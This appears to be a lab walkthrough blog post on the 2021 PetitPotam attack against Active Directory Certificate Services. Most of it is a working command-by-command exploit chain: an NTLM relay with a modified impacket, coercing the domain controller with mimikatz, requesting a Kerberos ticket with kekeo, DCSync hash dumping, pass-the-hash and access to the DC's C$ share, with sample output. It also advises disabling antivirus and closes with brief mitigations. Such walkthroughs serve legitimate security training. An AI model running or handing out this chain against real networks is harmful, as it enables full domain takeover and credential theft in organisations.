Hot on the heels of PrintNightmare, there is yet another way to take over Active Directory. Petit Potam is the name of the attack and it centres around the use of AD Certificate Services, specifically the default settings behind the Web Enrollment service. You can achieve full Domain Admin takeover of a target AD by using this attack, which makes it pretty scary. The attack makes use of the MS-EFSR (Encrypted File System rpc) calls without authentication. Benjamin Delpay has implemented the attack in his latest Mimikatz builds. So lets get to labbing!

Prerequisites
Disclaimer: this is a test lab environment, not production. Never run exploits or mess with production environments without explicit permission.
1. You will need a domain environment for this lab. 1x DC (with Active Directory installed), and 1 x Member server with AD CS and Web Enrollment service installed. Both 2019 server will do. The member server requires the Enterprise CA to be installed (domain integrated).
2. You will also need a Kali VM and a Windows VM (not on the domain).
3. Be sure to setup the domain correctly, install the roles etc and reboot both servers before attempting the attack.
4. Run the command cerutil -pulse on the DC to make sure its updated with the member server using the CA
5. In this example the DC is 10.1.1.1 (name DC) and the AD CS Member server is 10.1.1.2 (name CA). Kali is 10.1.1.10. The Windows host is 10.1.1.11. The domain is called lab.local.
pp-topology

Downloads
1. Windows VM, download mimikatz and kekeo (the browser will block these as will AV, be sure to turn off your av or run this in VMs. Use firefox to get around chrome download blocks).
2. On your Kali VM download ExAndroidDev’s fork of impacket with the modified ntlmrelayx for this attack. Install it on Kali like so:
mkdir dev
cd dev
git clone https://github.com/ExAndroidDev/impacket.git
cd impacket
git switch ntlmrelayx-adcs-attack
sudo python3 ./setup.py install

Method
1. On your Windows host open cmd and execute mimikatz:
mimikatz # lsadump::dcsync /domain:lab.local /user:krbtgt

2. Switch to your Kali VM. Launch the relay attack like so:
ntlmrelayx.py -debug -smb2support --target http://10.1.1.2/certsrv/certfnsh.asp --adcs --template DomainController

3. Back on your Windows host execute the integrated petitpotam attack with mimikatz:
mimikatz # misc::efs /server:10.1.1.1 /connect:10.1.1.10 /noauth

4. At this point, on your Kali VM you will see the certificates being generated. Wait a few seconds to see one that says “code 200 and treating as a sucessful login”. Then stop the ntlmrelayx script. Copy the base64 certificate to the clipboard.
[*] SMBD-Thread-4: Connection from LAB/DC$@10.1.1.1 controlled, attacking target http://10.1.1.2
[*] HTTP server returned error code 200, treating as a successful login
[*] Authenticating against http://10.1.1.2 as LAB/DC$ SUCCEED
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] GOT CERTIFICATE!
[*] Base64 certificate of user DC$:

5. Switch over to your Windows host and launch kekeo from cmd prompt. Run the following command, be sure to paste your certificate in after the /pfx switch.
kekeo # base64 /input:on
kekeo # tgt::ask /pfx: /user:DC$ /domain:lab.local /ptt

6. If it all went correctly kekeo will output the kerberos response:
Realm : lab.local(lab)
User : DC$ (DC$)
CName : DC$ [KRB_NT_PRINCIPAL (1)] SName : krbtgt/lab.local [KRB_NT_SRV_INST (2)] Need PAC : Yes
Auth mode : RSA
[kdc] name: dc.lab.local (auto)
[kdc] addr: 10.1.1.1 (auto)
> krbtgt/lab.local : OK!

The output above indicates obtaining a kerberos ticket from the KDC (dc.lab.local) was sucessful.

7. On the Windows host open a command prompt and lets check our kerberos ticket:
klistIt should show the cached ticket. Like so:
Cached Tickets: (1)
#0> Client: DC$ @ LAB.LOCAL
Server: krbtgt/lab.local @ LAB.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 7/28/2021 23:50:54 (local)
End Time: 7/29/2021 9:50:54 (local)
Renew Time: 8/4/2021 23:50:54 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:

8. Switch back to Mimikatz and run the lsadump:
lsadump::dcsync /domain:lab.local /user:administrator
Copy the ntlm hash to the clipboard.

9. On the Windows host a command prompt as administrator and launch another instance of mimikatz. We will now pass the hash from step 8:
privilege::debug
sekurlsa::pth /user:Administrator /domain:lab.local /ntlm:

pth
A new command prompt will open, map to the DC servers C$ share like so:
net use x: \\dc\c$
dir x:

Owned

So we went from no credentials / no authentication to full domain admin / owned by abusing the AD CS default configuration. The misc::efs command within Mimikatz implements the petit potam attack (1. below) abusing MS-EFSR (which does not require authentication) to coerce the DC (2.) to authenticate to our kali ntlmrelayx instance. In turn the ntlmrelayx is forwarding the request (3.) to the AD CS Web enrollment service which is misconfigured by default and accepts the ntlm machine auth from our dc. As we are in the middle we can then copy the credentials and perform pass the hash to the domain admin / administrator account. At this point its game over.
pp-labels

Mitigation
1. Disable AD CS Web Enrollment Service
2. OR Remove NTLM/Negotiation from authentication certsrv site in IIS Managment.
3. OR try extended protection for the certsrv app with SSL.

Links
https://twitter.com/gentilkiwi/status/1418660994931376136
https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/
https://www.bussink.net/ad-cs-exploit-via-petitpotam-from-0-to-domain-domain/
https://msrc.microsoft.com/update-guide/vulnerability/ADV210003 -> Note this MSRC Advisory is actually wrong, you do not need an account on the domain to implement this attack, just access to the network. Thats what makes this so critical, especially for enteprises.